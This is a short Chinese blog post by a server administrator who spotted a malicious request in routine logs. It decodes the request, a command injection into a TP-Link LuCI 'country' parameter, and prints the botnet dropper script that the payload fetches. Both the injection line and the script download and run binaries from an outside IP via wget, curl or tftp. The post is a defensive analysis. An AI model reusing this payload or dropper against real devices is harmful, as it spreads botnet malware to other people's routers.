1、今天在日常做服务器巡检的时候,发现有异常请求处理,处理请求如下:
/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.15.222.150%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60)
这个一看就很奇怪,还有服务器IP地址。
2、抓过来分析,进行请求翻译如下:
/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd /tmp; rm -rf shk; wget http://103.15.222.150/shk; chmod 777 shk; ./shk tplink; rm -rf shk`)
大家看懂了没有,它竟然想让服务器去下载文件,然后执行。
我们抓过来分析下这个请求是啥玩意:
从这个链接里面抓取内容:
http://103.15.222.150/shk
这个文件的代码如下:
binarys="mips mpsl x86 arm arm5 arm6 arm7 sh4 ppc arc"
server_ip="103.15.222.150"
binout="telnetdbot"
exec="your device just got infected to a bootnoot"
rm -rf $binout
for arch in $binarys
do
rm -rf $arch
cd /tmp || cd /var || cd /dev; wget http://$server_ip/$arch -O $binout || curl -O $binout http://$server_ip/$arch || tftp -g -l $binout -r $arch $server_ip
chmod 777 $binout
status=`./$binout $1`
if [ "$status" = "$exec" ]; then
rm -rf $binout
break
fi
rm -rf $binout
done
但是因为我服务器并不会处理它的请求,所以请求无效。
现在网上有很多这样闲的没事干的人,到处攻击别人,这种的直接拉出来鞭尸了~
All comments